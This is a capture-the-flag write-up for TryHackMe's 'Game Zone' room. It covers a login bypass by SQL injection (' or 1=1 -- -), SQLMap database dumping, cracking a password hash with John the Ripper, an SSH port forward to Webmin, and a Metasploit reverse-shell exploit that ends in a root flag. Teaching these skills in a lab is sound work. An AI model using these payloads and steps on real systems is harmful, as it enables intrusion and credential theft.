Game Zone - TryHackMe

7 min read

Published at: Mar 8, 2024

Picture of hitman

Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root!




The overall goal of the room is to understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges.

Cheat Sheet

Before we begin, as always there is a generic Cheat Sheet for this room which could be integrated in your own notes. You find it at at the bottom of this write-up. You can also find all of my notes at


Task 1 - Deploy the vulnerable machine


What is the name of the large cartoon avatar holding a sniper on the forum?

Once we have launched the machine, I make a simple attempt to access the mentioned webserver by putiting the IP address of the machine into the search bar.

Landing page
Landing page, displaying the avatar mentioned in the question

To answer what the name of the person is, we can first try and see if the file name gives us any information by opening the image in a new tab.

Unfortunately it did not, the picture name is only "header_image.png" - but we can resort to using googles reverse image search. Here we find a common nominator.

Agent 47
He is the main character in a video game called Hitman


Agent 47

Task 2 - Obtain access via SQLi


When you've logged in, what page do you get redirected to?

Executing what TryHackMe has given us, we successfully log into the website using the query ' or 1=1 -- - as the username.

Landing page once logged in
This is our new landing page when we have logged in.



Task 3 - Using SQLMap

Using SQLMap and Burp

SQLMap is a very popular tool amongs pentesters and in red team engagements. Now we will use this tool to find


SQL Injection

vulnerabilities in a more automatic manner.

A common way to load information about the page you are trying to test with SQLMap, is by feeding it a HTTP request. This can be done via BurpSuite.

  1. Start burp.
  2. Navigate to the proxy tab.
  3. Now you want to capture the request in one of two ways.

By using the Burp browser

Capture request with the burp browser
First open the browser and navigate to where you want to capture a request, then toggle on the intercept.

By using FoxyProxy

If you still want to use your firefox browser, you can install the FoxyProxy plugin. Then you want to open the proxy options and fill in the information from your burp Suite:

FoxyProxy settings
Burp settings

Now toggle on the plugin and activate intercept in burp, as if you were using the Burp browser.

Activate foxy plugin

Now either way you decided to capture the request. Input something into the search bar and hit enter. Now it should have been captured and look something like this.

Copy to file
Click "Copy to file", make sure you have a "searchitem" query.

Now we can feed this into SQLMap as follows:

sqlmap -r request
  • --dbs: list databases
  • -D x: enumerate database x
  • --tables: list tables
  • -T x: enumerate table x
  • --columns: list columns
  • --dump: dump the column values

If we run this we will get the following:

Vulnerability found

Now with the vulnerability found, we can run the command again but with the other flags above to get specific information.



  1. In the users table, what is the hashed password?
  2. What was the username associated with the hashed password?
  3. What was the other table name?
  1. List databases with --dbs:
sqlmap -r request --dbs
  1. Then select the database 'db':
sqlmap -r request -D db
  1. Repeat the previous two steps but now with --tables and -T:
sqlmap -r request -D db --tables
sqlmap -r request -D db -T users
  1. Now finally dumb the tables values with --dump.

SQLMap cracking

When you dump the tables, SQLMap will ask you if you want to crack the password. If you use the standard list, this will fail. However the standard list is very quick for the program to go trough and could be usefull to find any easy passwords. But keep in mind that other cracking software such as John or Hashcat is generally faster and should be used.


  1. ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
  2. agent47
  3. post

Task 4 - Cracking a password with JohnTheRipper

Now we will crack the hash using the popular tool, JohnTheRipper. To prepare the hash I simply echod the hash into a new file:

echo "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14" > hash.txt

Hashing format

John will generally detect which format to use, instead of inputting --format. It will also list the formats it think is in use. To have better control however, it's generally preferred to add the format flag manually. You can check what hashing algorithm is in use with hash-identifier and entering the hash.

Question 1


What is the de-hashed password?

john hash.txt --wordlist=/usr/share/worldlists/rockyou.txt --format=Raw-SHA256



Question 2


What is the user flag?

Suggested by the task, we will get the user flag by accessing the server via SSH. The standard port for SSH is 22:

ssh -p 22 [email protected]
# Address format: username@server_ip/domain

-p : port

The user flag has been found



Task 5 - Exposing services with reverse SSH tunnels

In this task we will use ss together with ssh to access services otherwise blocked by a firewall from the outside. ss is the improved netstat.

We will start by using ss -tulpn.

Argument Description
-t Display TCP sockets
-u Display UDP sockets
-l Displays only listening sockets
-p Shows the process using the socket
-n Doesn't resolve service names
Found a service running on port 10000
Found a service due to how port 10000 is not normally in use.

Then we can run the ssh port forward on our client to make the http service available to us.


Remember that reused credentials are one of the most common and effective ways to gain access to multiple systems. By attempting the same credentials from before we gain access to the


Content Management System




  1. How many TCP sockets are running?
  2. What is the name of the exposed CMS?
  3. What is the CMS version?


  1. 5
  2. Webmin
  3. 1.580

Task 6 - Privilege Escalation with Metasploit

Taking the advice from the TryHackMe task, we enter metasploit and search for an an exploit.

Metasploit search for the exploit
Now we can select the exploit with 'use 0'

To list the exploit options, use show options and thereafter set the following parameters:

set password videogamer123
set rhosts localhost
set ssl false
set username agent47
set payload cmd/unix/reverse
set lhost tun0

Now you can simply run the exploit!

We have a shell!
We have a shell!

To enter the shell use sessions 2 (or your session number) followed by cat /root/root.txt to read the final flag!



What is the root flag?



Bonus Task! Manual Exploitation

Looking at what the exploit actually does, we can navigate to exploit-db and look at exploit. Here we notice that it is basically a path traversal vulnerability, where whatever path we go to - the server will run.

Where the exploit takes place
Everything after /file/show.cgi will be executed.

We can use this to read the flag instantly!

Read the root flag manually

Cheat Sheet

You can also find all of the following under the notes category.


Reverse image search:


sqlmap -r request
  • --dbs: list databases
  • -D x: enumerate database x
  • --tables: list tables
  • -T x: enumerate table x
  • --columns: list columns
  • --dump: dump the column values


Hashcracking with JohnTheRipper

john hash.txt --wordlist=/usr/share/worldlists/rockyou.txt --format=Raw-SHA256


Argument Description
-t Display TCP sockets
-u Display UDP sockets
-l Displays only listening sockets
-p Shows the process using the socket
-n Doesn't resolve service names
-h Help


Port forward: CLIENT -> YOU:

ssh -L [email protected]


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